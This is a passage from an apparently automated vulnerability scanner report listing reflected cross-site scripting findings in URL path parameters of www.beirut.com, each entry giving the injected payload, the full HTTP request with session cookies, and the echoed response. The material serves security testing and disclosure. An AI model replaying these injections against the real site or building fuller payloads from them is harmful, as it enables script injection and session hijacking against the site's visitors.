...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurants7f782"><a>3e05360c623">
...[SNIP]...

4.701. http://www.beirut.com/Restaurants/Cafes/318727173 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Cafes/318727173

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a80c9'-alert(1)-'cba51ac81f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurantsa80c9'-alert(1)-'cba51ac81f4/Cafes/318727173 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:48:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Restaurantsa80c9'-alert(1)-'cba51ac81f4/Cafes';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.702. http://www.beirut.com/Restaurants/Cafes/318727173 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Cafes/318727173

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1ec7'-alert(1)-'e04c5a35b8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants/Cafesd1ec7'-alert(1)-'e04c5a35b8b/318727173 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:50:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Restaurants/Cafesd1ec7'-alert(1)-'e04c5a35b8b';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.703. http://www.beirut.com/Restaurants/Caterers/7413291663 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Caterers/7413291663

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 829cb'-alert(1)-'357f319378e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants829cb'-alert(1)-'357f319378e/Caterers/7413291663 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:09:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Restaurants829cb'-alert(1)-'357f319378e/Caterers';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.704. http://www.beirut.com/Restaurants/Caterers/7413291663 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Restaurants/Caterers/7413291663

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3aa2"><a>dd5ba344a9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurantsa3aa2"><a>dd5ba344a9c/Caterers/7413291663 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:00:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurantsa3aa2"><a>dd5ba344a9c">
...[SNIP]...

4.705. http://www.beirut.com/Restaurants/Caterers/7413291663 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Caterers/7413291663

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ca34'-alert(1)-'d89526939fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants/Caterers5ca34'-alert(1)-'d89526939fc/7413291663 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:13:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Restaurants/Caterers5ca34'-alert(1)-'d89526939fc';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.706. http://www.beirut.com/Restaurants/Dining/314749128 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Restaurants/Dining/314749128

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 454a7"><a>25a1267588b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurants454a7"><a>25a1267588b/Dining/314749128 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:37:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurants454a7"><a>25a1267588b">
...[SNIP]...

4.707. http://www.beirut.com/Restaurants/Dining/314749128 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Dining/314749128

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32920'-alert(1)-'e8c6b429882 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants32920'-alert(1)-'e8c6b429882/Dining/314749128 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:45:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Restaurants32920'-alert(1)-'e8c6b429882/Dining';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.708. http://www.beirut.com/Restaurants/Dining/314749128 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Dining/314749128

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c046a'-alert(1)-'2c4e79b57ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants/Diningc046a'-alert(1)-'2c4e79b57ff/314749128 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:49:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Restaurants/Diningc046a'-alert(1)-'2c4e79b57ff';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.709. http://www.beirut.com/Restaurants/Health-and-Diet-Shops/34430696 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Restaurants/Health-and-Diet-Shops/34430696

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87bd8"><a>b7211b4e85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurants87bd8"><a>b7211b4e85/Health-and-Diet-Shops/34430696 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:41:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurants87bd8"><a>b7211b4e85">
...[SNIP]...

4.710. http://www.beirut.com/Restaurants/Health-and-Diet-Shops/34430696 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Health-and-Diet-Shops/34430696

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fb93'-alert(1)-'64c467db7a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants4fb93'-alert(1)-'64c467db7a1/Health-and-Diet-Shops/34430696 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:50:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Restaurants4fb93'-alert(1)-'64c467db7a1/Health-and-Diet-Shops';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.711. http://www.beirut.com/Restaurants/Health-and-Diet-Shops/34430696 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Health-and-Diet-Shops/34430696

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90987'-alert(1)-'f376bd7dc13 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants/Health-and-Diet-Shops90987'-alert(1)-'f376bd7dc13/34430696 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:59:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Restaurants/Health-and-Diet-Shops90987'-alert(1)-'f376bd7dc13';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.712. http://www.beirut.com/Restaurants/Ice-Cream-and-Sweets/2144072380 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Restaurants/Ice-Cream-and-Sweets/2144072380

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bb78"><a>b553ecdde1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurants9bb78"><a>b553ecdde1b/Ice-Cream-and-Sweets/2144072380 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:53:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurants9bb78"><a>b553ecdde1b">
...[SNIP]...

4.713. http://www.beirut.com/Restaurants/Ice-Cream-and-Sweets/2144072380 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Ice-Cream-and-Sweets/2144072380

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc6d6'-alert(1)-'b85be5bc31d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurantsbc6d6'-alert(1)-'b85be5bc31d/Ice-Cream-and-Sweets/2144072380 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:01:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Restaurantsbc6d6'-alert(1)-'b85be5bc31d/Ice-Cream-and-Sweets';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.714. http://www.beirut.com/Restaurants/Ice-Cream-and-Sweets/2144072380 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Ice-Cream-and-Sweets/2144072380

Issue detail

